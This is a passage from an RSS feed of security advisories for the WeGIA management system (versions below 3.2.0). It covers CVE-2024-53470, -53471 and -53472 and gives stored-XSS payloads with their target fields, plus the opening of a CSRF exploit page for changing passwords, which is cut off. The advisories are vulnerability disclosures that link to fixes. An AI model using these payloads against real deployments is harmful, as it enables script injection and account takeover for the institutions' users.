&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS3&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;id=&amp;amp;quot;plataforma-chave&amp;amp;quot;&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;name=&amp;amp;quot;token&amp;amp;quot;&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/user-attachments/assets/99287dce-2b9d-42e0-a2e8-6164cda24619&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;image&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53470&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;solution&amp;#34;&amp;gt;Solution
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonLazarin/WeGIA/issues/789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/789&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Cardoso Borda Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 05 Dec 2024 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-53471</title>
        <link>https://www.cvehunters.com/p/cve-2024-53471/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-53471/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-53471-stored-xss-in-meio_pagamentophp-function&amp;#34;&amp;gt;CVE-2024-53471: Stored XSS in &amp;lt;code&amp;gt;meio_pagamento.php&amp;lt;/code&amp;gt; function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-53471-stored-xss-in-meio_pagamentophp-function&amp;#34;&amp;gt;CVE-2024-53471: Stored XSS in &amp;lt;code&amp;gt;meio_pagamento.php&amp;lt;/code&amp;gt; function
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A stored Cross-Site Scripting (XSS) vulnerability was identified in the WeGIA application. This vulnerability allows unauthorized scripts to be executed within the user&amp;#39;s browser context. Stored XSS is particularly critical, as the malicious code is permanently stored on the server and executed whenever a compromised page is loaded, affecting all users accessing this page.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;File: &amp;lt;code&amp;gt;meio_pagamento.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Payload:&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Alert: XSS4&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;);&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;Endpoint: &amp;lt;code&amp;gt;id=&amp;amp;quot;meio-pagamento-nome&amp;amp;quot;&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;name=&amp;amp;quot;nome&amp;amp;quot;&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;https://github.com/user-attachments/assets/d6dedcf1-92f1-4b2c-8ea0-27ce1408c23b&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;image&amp;#34;
	
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53471&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;solution&amp;#34;&amp;gt;Solution
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/nilsonLazarin/WeGIA/issues/789&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/nilsonLazarin/WeGIA/issues/789&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;discoverer&amp;#34;&amp;gt;Discoverer
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Cardoso Borda Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 05 Dec 2024 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2024-53472</title>
        <link>https://www.cvehunters.com/p/cve-2024-53472/</link>
        <guid>https://www.cvehunters.com/p/cve-2024-53472/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2024-53472-csrf-in-controlphp-to-change-password&amp;#34;&amp;gt;CVE-2024-53472: CSRF in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; to change password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2024-53472-csrf-in-controlphp-to-change-password&amp;#34;&amp;gt;CVE-2024-53472: CSRF in &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; to change password
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2024-53472&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;vendor&amp;#34;&amp;gt;Vendor
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; WeGIA (Web Gerenciador Institucional) is an integrated management system licensed under the GNU GPL v3.0, designed to enhance administration, control, and transparency for institutions. &amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.wegia.org/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.wegia.org&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://sol.sbc.org.br/index.php/latinoware/article/view/31544&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;affected-product-code-base&amp;#34;&amp;gt;Affected Product Code Base
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;WeGIA &amp;amp;lt; v3.2.0&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;vulnerability-description&amp;#34;&amp;gt;Vulnerability Description
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Cross-Site Request Forgery (CSRF) vulnerability was identified in the WeGIA application. This flaw enables an attacker to induce an authenticated user to perform unintended actions without their consent or awareness.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This code allows an attacker to change the password of an authenticated user without their consent by loading this malicious page while the user is logged into the application.&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cp&amp;#34;&amp;gt;&amp;amp;lt;!DOCTYPE html&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;html&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;lang&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;en&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;head&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;meta&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;charset&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;&amp;amp;#34;UTF-8&amp;amp;#34;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;    &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;title&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;CSRF Exploit&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;title&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
